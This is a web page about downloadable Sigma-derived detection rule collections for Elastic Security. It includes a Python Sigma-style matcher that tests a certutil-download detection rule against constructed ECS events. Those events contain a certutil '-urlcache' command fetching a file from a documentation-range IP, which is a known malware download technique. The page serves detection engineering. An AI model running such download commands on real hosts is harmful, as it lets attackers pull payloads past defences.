Detection rules downloads

A collection of rules based on the Sigma detection rules for web server logs, e.g. Apache, nginx or IIS.

A collection of rules based on the Sigma detection rules for proxy server and web server logs, e.g. Zeek or Suricata.

A collection of rules based on the Sigma detection rules for Windows Sysmon events based on Winlogbeat data.

A collection of rules based on the Sigma rules for Windows (process creation folder) based on Winlogbeat data.

A collection of rules based on the Sigma rules for Windows (builtin folder) based on Winlogbeat data.

A collection of rules based on the Sigma rules for AWS based on the Filebeat AWS module and the Elastic Agent integration.

A collection of rules based on the Sigma rules for Zeek based on the Filebeat Zeek module.


More about Detection rules

The SIEM detection rules for Elastic Security define how the Elastic Security detection engine searches the indexed data for threats. The detection rules are a common set of rules that can be applied to existing data. Elastic delivers many rules out of the box (OOTB). Show all prebuilt Elastic rules.

Because the rules are written against the fields and categories defined in ECS (Elastic Common Schema), they automatically work with Beats logs, Elastic Agent data and any other data source that is correctly mapped to ECS. The reverse also holds: a source that is not mapped to ECS, or is mapped to the wrong fields, produces no alerts without any error, so verify the field mapping of each data source before relying on a rule.
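To make the ECS point concrete, here is a small Sigma-style matcher run over constructed events. It is an added example, not code from Elastic, Sigma or the rule collections listed above, and it supports only the rule shape it needs (equality plus the `contains`, `startswith` and `endswith` modifiers, lists as OR, and the conditions `selection` and `selection and not filter`). The rule, the parent-process filter value `ManagementTool.exe` and the four events are all constructed for illustration; the field names (`process.name`, `process.command_line`, `process.parent.name`) are the ECS fields that Winlogbeat's Sysmon module and the Elastic Agent produce for process-creation events.

```python
"""Minimal Sigma-style matcher over ECS documents (added example, not Elastic's or Sigma's code)."""

# Constructed rule in Sigma's shape, written against ECS field names.
# Hypothetical rule: it mirrors the style of Sigma's process_creation rules but is not a real one.
RULE = {
    "title": "Example: certutil download via urlcache (constructed)",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "process.name|endswith": "certutil.exe",
            "process.command_line|contains": ["urlcache", "verifyctl"],   # list = OR
        },
        "filter": {
            "process.parent.name": "ManagementTool.exe",   # hypothetical allow-listed parent
        },
        "condition": "selection and not filter",
    },
}

# Sigma string matching is case-insensitive by default, so both sides are lower-cased.
MODIFIERS = {
    None: lambda value, pat: value == pat,
    "contains": lambda value, pat: pat in value,
    "startswith": lambda value, pat: value.startswith(pat),
    "endswith": lambda value, pat: value.endswith(pat),
}


def get_field(doc, path):
    """Resolve an ECS path like 'process.parent.name' against nested dicts or flat dotted keys."""
    if path in doc:
        return doc[path]
    cur = doc
    for part in path.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return None
        cur = cur[part]
    return cur


def field_matches(doc, spec, patterns):
    """One 'field|modifier: value(s)' entry; a list of values is an OR."""
    field, _, modifier = spec.partition("|")
    value = get_field(doc, field)
    if value is None:           # field absent: an unmapped source never matches
        return False
    value = str(value).lower()
    if not isinstance(patterns, list):
        patterns = [patterns]
    cmp = MODIFIERS[modifier or None]
    return any(cmp(value, str(p).lower()) for p in patterns)


def block_matches(doc, block):
    """All entries of a selection/filter map must match (AND)."""
    return all(field_matches(doc, spec, pats) for spec, pats in block.items())


def rule_matches(doc, rule):
    det = rule["detection"]
    cond = det["condition"]
    if cond == "selection":
        return block_matches(doc, det["selection"])
    if cond == "selection and not filter":
        return block_matches(doc, det["selection"]) and not block_matches(doc, det["filter"])
    raise ValueError(f"unsupported condition: {cond}")


# Constructed events. The first two are the same kind of execution as it lands in Elasticsearch
# after ECS mapping (nested form as Winlogbeat's Sysmon module emits it, flat dotted form as some
# pipelines emit). The third carries the raw Sysmon field names with no ECS mapping at all.
# 198.51.100.0/24 is a documentation range.
EVENTS = [
    {"event": {"category": ["process"], "type": ["start"]},
     "process": {"name": "certutil.exe",
                 "command_line": "certutil.exe -urlcache -split -f http://198.51.100.7/a.txt a.txt",
                 "parent": {"name": "cmd.exe"}}},
    {"event.category": "process",
     "process.name": "CERTUTIL.EXE",
     "process.command_line": "CERTUTIL.EXE -URLCACHE -f http://198.51.100.7/a.txt",
     "process.parent.name": "ManagementTool.exe"},          # suppressed by the filter
    {"winlog": {"event_data": {"Image": "C:\\Windows\\System32\\certutil.exe",
                               "CommandLine": "certutil.exe -urlcache -f http://198.51.100.7/a.txt"}}},
    {"process": {"name": "certutil.exe", "command_line": "certutil.exe -hashfile a.txt SHA256",
                 "parent": {"name": "cmd.exe"}}},           # benign use, no download switch
]


def evaluate(events, rule=RULE):
    """Return one boolean per event: does the rule fire on it?"""
    return [rule_matches(e, rule) for e in events]


if __name__ == "__main__":
    for event, hit in zip(EVENTS, evaluate(EVENTS)):
        print("ALERT " if hit else "  -   ", event)
```

The third event is the one to look at: it is the same certutil download, but because its fields were never mapped to ECS the rule sees no `process.name` and stays silent. That is exactly the failure mode of a misconfigured ingest pipeline, and it is why the mapping of each source should be checked before a rule collection is trusted.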

Elastic has opened the repository for these rules so that the community can contribute to them. There are also other projects, such as Sigma, that produce SIEM detection rules for different systems; the collections listed above are derived from Sigma's rules.